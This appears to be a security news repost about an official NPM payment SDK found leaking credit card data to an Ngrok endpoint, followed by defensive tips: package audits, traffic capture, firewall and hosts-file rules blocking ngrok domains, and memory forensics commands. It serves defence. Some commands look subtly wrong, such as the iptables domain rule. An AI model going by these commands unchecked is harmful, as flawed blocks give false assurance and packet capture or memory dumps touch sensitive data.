Payment Processor Publishes Official NPM Package That Leaks Credit Card Data via Ngrok

By /

Listen to this Post

A recently discovered NPM package, published under the official account of a global payment processing company, was found to leak sensitive credit card details to a Ngrok endpoint. This malicious SDK was designed for mobile app integrations, posing a severe threat to applications using it. The package has since been removed after disclosure to NPM and the affected company.

Read the full article here:

https://www.getsafety.com/blog-posts/payment-processor-publishes-official-npm-package-that-leaks-credit-card-data-via-ngrok

You Should Know:

1. Detecting Malicious NPM Packages

Use the following commands to inspect NPM packages before installation:

 Check package metadata 
npm view <package-name>

List package dependencies 
npm ls <package-name>

Audit installed packages for vulnerabilities 
npm audit

2. Monitoring Suspicious Network Activity

If you suspect data exfiltration via Ngrok or other tunneling tools, use these Linux commands:

 Check active network connections 
netstat -tulnp

Monitor outbound traffic 
sudo tcpdump -i any 'dst port 80 or 443' -w traffic.pcap

Inspect DNS queries 
sudo tshark -i any -f "port 53" -Y "dns"

3. Securing Mobile SDKs

For developers integrating third-party SDKs:

  • Always verify checksums: 
    shasum -a 256 <file-path>
  • Use Burp Suite or Wireshark to analyze SDK network traffic.

4. Blocking Ngrok Endpoints

Add Ngrok domains to your firewall blocklist:

 Using iptables 
sudo iptables -A OUTPUT -d .ngrok.io -j DROP

Or via hosts file 
echo "0.0.0.0 ngrok.io" | sudo tee -a /etc/hosts

5. Windows Defender for Malware Detection

Scan for malicious DLLs or executables:

 Run a full system scan 
Start-MpScan -ScanType FullScan

Check loaded modules in a process 
Get-Process -Name <process> | Select -ExpandProperty Modules

What Undercode Say

Supply chain attacks are escalating, and developers must adopt rigorous security practices:
– Always verify package sources (use `npm ci` for deterministic installs).
– Monitor network traffic for unusual outbound connections.
– Use static analysis tools like `SonarQube` or `Snyk` for dependency checks.
– Implement runtime protection (e.g., `Falco` for Linux anomaly detection).

For incident responders:

 Capture process memory of a suspicious app 
sudo gcore -o dump <PID>

Analyze with Volatility 
vol.py -f dump.<PID> --profile=LinuxUbuntu_5x64 pslist

Expected Output:

A secure development workflow with automated checks for:

  • Unauthorized dependencies (npm audit --production).
  • Data exfiltration (suricata -c /etc/suricata/suricata.yaml).
  • Runtime integrity (aide --check for file changes).

Stay vigilant—attackers are targeting open-source ecosystems more than ever.

References:

Reported By: Mccartypaul Softwaresupplychain – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Related Posts: